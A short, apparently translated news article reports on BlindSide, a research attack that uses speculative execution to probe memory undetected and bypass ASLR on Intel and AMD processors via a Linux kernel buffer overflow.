Experts from the Swiss Higher Technical School of Zurich, Stevens Institute of Technology, and the Free University of Amsterdam spoke about the speculative attack they created BlindSide…
This attack works regardless of architecture and has been tested on both Intel and AMD processors. The essence of BlindSide is to abuse a feature that boosts processor performance and use it to bypass the ASLR (Address Space Layout Randomization) security mechanism.
Separately, it is noted that patches previously released for such well-known speculative bugs as Specter and Meltdown do not help against BlindSide.
In order to trick ASLR, the researchers say, an attacker usually needs to find a "information leak" vulnerability to probe memory and find the right place where the target application is launched, and then target the malicious code precisely at the allocated address space. As a rule, such memory “probing” is easily detected, and defense mechanisms block the attacker, but BlindSide allows such an attack to be transferred to the plane of speculative or preemptive execution (speculative), and as a result, the attacker can go unnoticed.
In essence, speculative execution is intended to improve processor performance. So, along with the main thread, the processor performs other tasks in advance that can also be useful. According to the researchers, this mechanism can also be used to "amplify the severity of common vulnerabilities, including errors that violate the integrity of information in memory." That is, by exploiting speculative execution, BlindSide can exploit a vulnerability over and over again by scrutinizing memory until the ASLR is eventually bypassed.
Due to the fact that the attack takes place in the sphere of speculative execution, all unsuccessful attempts do not in any way affect the processor and its stability, and in general they are practically invisible. To implement such an attack, a hacker only needs a simple vulnerability associated with a violation of the integrity of information in memory. The researchers themselves used a buffer overflow problem in the Linux kernel for this. The video below demonstrates the test attack in action.